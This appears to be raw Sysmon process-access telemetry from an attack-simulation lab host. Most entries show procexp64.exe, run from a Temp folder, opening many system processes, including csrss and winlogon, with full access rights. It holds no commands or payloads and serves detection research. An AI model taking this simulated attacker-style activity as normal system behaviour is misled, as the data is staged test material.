15:16:39.814{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790153Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.814{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790152Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.814{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790151Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.814{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790150Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790149Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790148Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790147Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790146Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790145Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790144Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790143Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790142Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790141Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790140Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790139Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790138Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790137Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790136Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790135Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790134Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790133Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790132Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790131Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790130Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790129Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790128Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790127Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790126Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790125Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790124Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790123Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790122Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790121Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790120Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790119Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790118Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.314{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790117Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 